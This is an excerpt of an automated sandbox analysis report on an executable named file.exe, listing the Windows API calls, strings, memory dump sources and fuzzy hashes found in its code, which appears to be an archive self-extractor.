• _free.LIBCMT ref: 00E598CA
• SetLastError.KERNEL32(00000000,?,00E71030,00000200), ref: 00E598D7
• SetLastError.KERNEL32(00000000,?,00E71030,00000200), ref: 00E598E0
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_file.jbxd
Similarity
• API ID: ErrorLast$_free
• String ID:
• API String ID: 3170660625-0
• Opcode ID: bbe73972c7e2e6fed8852c50ba3ceceebbb5d3e94f8536a2734a875e4369ef69
• Instruction ID: e7a03ab22f981622828c3e3d95a2c21d87ae7a3dcdc400dd88f706659a554d2e
• Opcode Fuzzy Hash: bbe73972c7e2e6fed8852c50ba3ceceebbb5d3e94f8536a2734a875e4369ef69
• Instruction Fuzzy Hash: CA012136104701ABC21A23356C8599B26AEDBD23B77242935FD05B2293EFA08C0D4220
APIs
  • Part of subcall function 00E411CF: ResetEvent.KERNEL32(?), ref: 00E411E1
  • Part of subcall function 00E411CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00E411F5
• ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00E40F21
• CloseHandle.KERNEL32(?,?), ref: 00E40F3B
• DeleteCriticalSection.KERNEL32(?), ref: 00E40F54
• CloseHandle.KERNEL32(?), ref: 00E40F60
• CloseHandle.KERNEL32(?), ref: 00E40F6C
  • Part of subcall function 00E40FE4: WaitForSingleObject.KERNEL32(?,000000FF,00E41206,?), ref: 00E40FEA
  • Part of subcall function 00E40FE4: GetLastError.KERNEL32(?), ref: 00E40FF6
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_file.jbxd
Similarity
• API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
• String ID:
• API String ID: 1868215902-0
• Opcode ID: ace5d4849ebd25de6a9c8171e576a0fa7f0a62ec8fce32c78dc667a1b7436991
• Instruction ID: b001f437897353f267e1b6e7ff7a90686c5a53bf9988f477277522ec58516d3d
• Opcode Fuzzy Hash: ace5d4849ebd25de6a9c8171e576a0fa7f0a62ec8fce32c78dc667a1b7436991
• Instruction Fuzzy Hash: F9015271500744EFC7629B65EC88BC6BBA9FB08750F000929F26B62161C7B57A58CB50
APIs
• _free.LIBCMT ref: 00E5C817
  • Part of subcall function 00E58DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00E5C896,?,00000000,?,00000000,?,00E5C8BD,?,00000007,?,?,00E5CCBA,?), ref: 00E58DE2
  • Part of subcall function 00E58DCC: GetLastError.KERNEL32(?,?,00E5C896,?,00000000,?,00000000,?,00E5C8BD,?,00000007,?,?,00E5CCBA,?,?), ref: 00E58DF4
• _free.LIBCMT ref: 00E5C829
• _free.LIBCMT ref: 00E5C83B
• _free.LIBCMT ref: 00E5C84D
• _free.LIBCMT ref: 00E5C85F
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 776569668-0
APIs
• _wcslen.LIBCMT ref: 00E41FE5
• _wcslen.LIBCMT ref: 00E41FF6
• _wcslen.LIBCMT ref: 00E42006
• _wcslen.LIBCMT ref: 00E42014
• CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00E3B371,?,?,00000000,?,?,?), ref: 00E4202F
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
Similarity
• API ID: _wcslen$CompareString
• String ID:
• API String ID: 3397213944-0
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
Similarity
• API ID: _swprintf
• String ID: %ls$%s: %s
• API String ID: 589789837-2259941744
APIs
• GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\file.exe,00000104), ref: 00E57FAE
• _free.LIBCMT ref: 00E58079
• _free.LIBCMT ref: 00E58083
Strings
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
Similarity
• API ID: _free$FileModuleName
• String ID: C:\Users\user\Desktop\file.exe
• API String ID: 2506810119-1957095476
APIs
• EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00E531FB
• _abort.LIBCMT ref: 00E53306
Strings
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
Similarity
• API ID: EncodePointer_abort
• String ID: MOC$RCC
• API String ID: 948111806-2084237596
APIs
• __EH_prolog.LIBCMT ref: 00E37406
  • Part of subcall function 00E33BBA: __EH_prolog.LIBCMT ref: 00E33BBF
• GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00E374CD
  • Part of subcall function 00E37A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00E37AAB
  • Part of subcall function 00E37A9C: GetLastError.KERNEL32 ref: 00E37AF1
  • Part of subcall function 00E37A9C: CloseHandle.KERNEL32(?), ref: 00E37B00
Strings
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
Similarity
• API ID: ErrorH_prologLast$CloseCurrentHandleProcess
• String ID: SeRestorePrivilege$SeSecurityPrivilege
• API String ID: 3813983858-639343689
APIs
  • Part of subcall function 00E31316: GetDlgItem.USER32(00000000,00003021), ref: 00E3135A
  • Part of subcall function 00E31316: SetWindowTextW.USER32(00000000,00E635F4), ref: 00E31370
• EndDialog.USER32(?,00000001), ref: 00E4AD98
• GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00E4ADAD
• SetDlgItemTextW.USER32(?,00000066,?), ref: 00E4ADC2
Strings
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
Similarity
• API ID: ItemText$DialogWindow
• String ID: ASKNEXTVOL
• API String ID: 445417207-3402441367
APIs
• DialogBoxParamW.USER32(GETPASSWORD1,0001047E,00E4B270,?,?), ref: 00E4DE18
Strings
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
Similarity
• API ID: DialogParam
• String ID: GETPASSWORD1$r$xz
• API String ID: 665744214-1165776382
APIs
• __fprintf_l.LIBCMT ref: 00E3D954
• _strncpy.LIBCMT ref: 00E3D99A
  • Part of subcall function 00E41DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00E71030,00000200,00E3D928,00000000,?,00000050,00E71030), ref: 00E41DC4
Strings
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                                                                                    • String ID: $%s$@%s
                                                                                                                    • API String ID: 562999700-834177443
                                                                                                                    • Opcode ID: 243dfdcb03f848e414c7e713a8d9c19e85252505bac74fade60aa248fd5b2d37
                                                                                                                    • Instruction ID: 0d8167f2300ad67e841fe66fdabf7dec864413cc2fa6ee7475389b1e90e245e4
                                                                                                                    • Opcode Fuzzy Hash: 243dfdcb03f848e414c7e713a8d9c19e85252505bac74fade60aa248fd5b2d37
                                                                                                                    • Instruction Fuzzy Hash: D3219372444348AEEF21DEA4EC09FDE7FE8AF45304F041412F910B61A2E2B1D648DF51
                                                                                                                    APIs
                                                                                                                    • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00E3AC5A,00000008,?,00000000,?,00E3D22D,?,00000000), ref: 00E40E85
                                                                                                                    • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00E3AC5A,00000008,?,00000000,?,00E3D22D,?,00000000), ref: 00E40E8F
                                                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00E3AC5A,00000008,?,00000000,?,00E3D22D,?,00000000), ref: 00E40E9F
                                                                                                                    Strings
                                                                                                                    • Thread pool initialization failed., xrefs: 00E40EB7
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                                                    • String ID: Thread pool initialization failed.
                                                                                                                    • API String ID: 3340455307-2182114853
                                                                                                                    • Opcode ID: d52460d4247e292a22aaa547939c8da23a63818ba02761295f68ae833a169768
                                                                                                                    • Instruction ID: 37cbe0446469be92053350b48b248ba14915dbcb3550068aa5c0517930fb59a8
                                                                                                                    • Opcode Fuzzy Hash: d52460d4247e292a22aaa547939c8da23a63818ba02761295f68ae833a169768
                                                                                                                    • Instruction Fuzzy Hash: 2D11A3B1640708AFC3219F7AAC849A7FBECEB95784F106C2EF1DAD3200D6B559508B50
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Malloc
                                                                                                                    • String ID: ($2$A
                                                                                                                    • API String ID: 2696272793-112831991
                                                                                                                    • Opcode ID: 9a0c0a40f21d268f37862945d3eabadb2f80d4a5462a6df8fa3fa66e124c05e3
                                                                                                                    • Instruction ID: 4c066aa00809a89ee498ef8a0be67fc3af7a85db4f862bc488ff945dea30e4e8
                                                                                                                    • Opcode Fuzzy Hash: 9a0c0a40f21d268f37862945d3eabadb2f80d4a5462a6df8fa3fa66e124c05e3
                                                                                                                    • Instruction Fuzzy Hash: 99011BB1901219AFCB14CFA5E8489DFBBF8AF09304F10415BE905F3210D7759A44DF94
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                                                    • API String ID: 0-56093855
                                                                                                                    • Opcode ID: 5179659853c64b954bafa3611e5b61c9ec887be4b17fe207377510cc06f227ec
                                                                                                                    • Instruction ID: 3454206cfec0b64130a11bbe90b58f70d52e0bb9697da7301563cc65bb08c8a8
                                                                                                                    • Opcode Fuzzy Hash: 5179659853c64b954bafa3611e5b61c9ec887be4b17fe207377510cc06f227ec
                                                                                                                    • Instruction Fuzzy Hash: C901D876E48245AFC711CF66FD089967BA8F759348B001526F409F3270D6709894EBA0
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00E3E2E8: _swprintf.LIBCMT ref: 00E3E30E
                                                                                                                      • Part of subcall function 00E3E2E8: _strlen.LIBCMT ref: 00E3E32F
                                                                                                                      • Part of subcall function 00E3E2E8: SetDlgItemTextW.USER32(?,00E6E274,?), ref: 00E3E38F
                                                                                                                      • Part of subcall function 00E3E2E8: GetWindowRect.USER32(?,?), ref: 00E3E3C9
                                                                                                                      • Part of subcall function 00E3E2E8: GetClientRect.USER32(?,?), ref: 00E3E3D5
                                                                                                                    • GetDlgItem.USER32(00000000,00003021), ref: 00E3135A
                                                                                                                    • SetWindowTextW.USER32(00000000,00E635F4), ref: 00E31370
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                                                                    • String ID: $0
                                                                                                                    • API String ID: 2622349952-2895914132
                                                                                                                    • Opcode ID: 000984efaae32dcf43616911140b953311b06a5b2eec6843620e375471c6739d
                                                                                                                    • Instruction ID: b6c0a829c7d6f659a54ad225d5ed5a060537c5043fe941c649e81bd3f169831f
                                                                                                                    • Opcode Fuzzy Hash: 000984efaae32dcf43616911140b953311b06a5b2eec6843620e375471c6739d
                                                                                                                    • Instruction Fuzzy Hash: 36F04F30144388AADF151F658C0EBFE3F99AF44388F05A29DFC49755A1CB75C998EA50
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __alldvrm$_strrchr
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1036877536-0
                                                                                                                    • Opcode ID: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                                                                                                    • Instruction ID: 16be9cd60b34dfa8c6cbf45eedd828b0d2a530618b0d236c759b0978eb4d5a35
                                                                                                                    • Opcode Fuzzy Hash: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                                                                                                    • Instruction Fuzzy Hash: 0FA12572A00786DFEB11CE28C8917EEFBE5EF51315F18596DE985AB283C2388949C750
                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00E37F69,?,?,?), ref: 00E3A3FA
                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00E37F69,?), ref: 00E3A43E
                                                                                                                    • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00E37F69,?,?,?,?,?,?,?), ref: 00E3A4BF
                                                                                                                    • CloseHandle.KERNEL32(?,?,?,00000800,?,00E37F69,?,?,?,?,?,?,?,?,?,?), ref: 00E3A4C6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Create$CloseHandleTime
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2287278272-0
                                                                                                                    • Opcode ID: 2d02acf3e6041fafa92457e404e4c29a057830d127018f71bd5f9aee5f8fe6e0
                                                                                                                    • Instruction ID: 92a44bc04d6c5cedad23b5f662818bd7de93c034f46635d843e3bf172c9ab74c
                                                                                                                    • Opcode Fuzzy Hash: 2d02acf3e6041fafa92457e404e4c29a057830d127018f71bd5f9aee5f8fe6e0
                                                                                                                    • Instruction Fuzzy Hash: B541B331148381AAD731DF24DC49FAFBBE4AF85704F08092DF5E5A3191D6A49A8CDB53
                                                                                                                    APIs
                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00E591E0,?,00000000,?,00000001,?,?,00000001,00E591E0,?), ref: 00E5C9D5
                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00E5CA5E
                                                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00E56CBE,?), ref: 00E5CA70
                                                                                                                    • __freea.LIBCMT ref: 00E5CA79
                                                                                                                      • Part of subcall function 00E58E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00E5CA2C,00000000,?,00E56CBE,?,00000008,?,00E591E0,?,?,?), ref: 00E58E38
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2652629310-0
                                                                                                                    • Opcode ID: ddc2e597f8aaf6bafc8b1c44d8d88e3343ae1e73f30495666c4ba30a7d2c5727
                                                                                                                    • Instruction ID: f7805eb9a8db626e267cb11bc598d5ac45b2c790650798c6ee0904119d351ed9
                                                                                                                    • Opcode Fuzzy Hash: ddc2e597f8aaf6bafc8b1c44d8d88e3343ae1e73f30495666c4ba30a7d2c5727
                                                                                                                    • Instruction Fuzzy Hash: 7C31DD32A0020AAFCB24CF64DC65DAE7BA5EB01715B140628FC05F6292EB35DD98CB90
APIs
• GetDC.USER32(00000000), ref: 00E4A666
• GetDeviceCaps.GDI32(00000000,00000058), ref: 00E4A675
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E4A683
• ReleaseDC.USER32(00000000,00000000), ref: 00E4A691
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
• Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_file.jbxd
Similarity
• API ID: CapsDevice$Release
• String ID:
• API String ID: 1035833867-0
• Opcode ID: 9a856235890cc70e673161150cf4c250b46999543a2f0b40b5505da25dccab3b
• Instruction ID: 22780b17601dfecce881b8a161892083e713ef0eadc9a13ff41979be796b70f3
• Opcode Fuzzy Hash: 9a856235890cc70e673161150cf4c250b46999543a2f0b40b5505da25dccab3b
• Instruction Fuzzy Hash: B1E01D35982721BFD3615B727D0DB8B3E54AB15B52F050113F605B51D0EB7449488B91
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
• Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_file.jbxd
Similarity
• API ID: _wcschr
• String ID: .lnk$d
• API String ID: 2691759472-761835416
• Opcode ID: febcaa32e4bbe7e9de61911e6c9db71c1375546d0d04c616901156cd822f8cd4
• Instruction ID: 8bbe3f1e6e8306ccf952454eeee2cb8ba5aa5b0d4d646c9719109299d9afc8ad
• Opcode Fuzzy Hash: febcaa32e4bbe7e9de61911e6c9db71c1375546d0d04c616901156cd822f8cd4
• Instruction Fuzzy Hash: 3AA171729042299ADF24DBA0ED45EFA73FCAF44304F08A5A6F509F3151EE749B84CB61
APIs
• __EH_prolog.LIBCMT ref: 00E375E3
  • Part of subcall function 00E405DA: _wcslen.LIBCMT ref: 00E405E0
  • Part of subcall function 00E3A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00E3A598
• SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00E3777F
  • Part of subcall function 00E3A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00E3A325,?,?,?,00E3A175,?,00000001,00000000,?,?), ref: 00E3A501
  • Part of subcall function 00E3A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00E3A325,?,?,?,00E3A175,?,00000001,00000000,?,?), ref: 00E3A532
Strings
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
• Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_file.jbxd
Similarity
• API ID: File$Attributes$CloseFindH_prologTime_wcslen
• String ID: :
• API String ID: 3226429890-336475711
• Opcode ID: ff2500d2251c296503cf4625827d50f0b9a53d6591e7ef56bc2c621de9847343
• Instruction ID: 9f95dceaf1a23289dd0bb2e29b5c1464f3169fef357b52cb1f25de5d26d686a0
• Opcode Fuzzy Hash: ff2500d2251c296503cf4625827d50f0b9a53d6591e7ef56bc2c621de9847343
• Instruction Fuzzy Hash: B04152B1801158A9EB35EB64DC5EEEEBBB8AF41300F0050E6B645B2092DB745F89CF70
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
• Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_file.jbxd
Similarity
• API ID: _wcschr
• String ID: *
• API String ID: 2691759472-163128923
• Opcode ID: c81482274c4dbe53e5d36c3c7a203be07f83adb563e3e8b9e0b0dffbf194872c
• Instruction ID: 82b49f2c1f7b179a8bc8acde7fa072f91999e143bea31bf8a90ede0c66478287
• Opcode Fuzzy Hash: c81482274c4dbe53e5d36c3c7a203be07f83adb563e3e8b9e0b0dffbf194872c
• Instruction Fuzzy Hash: E2316832544311AA8B30EE10990E67B7BE4DF90B18F14A01EFBA7B3043F7628D41D326
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
• Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
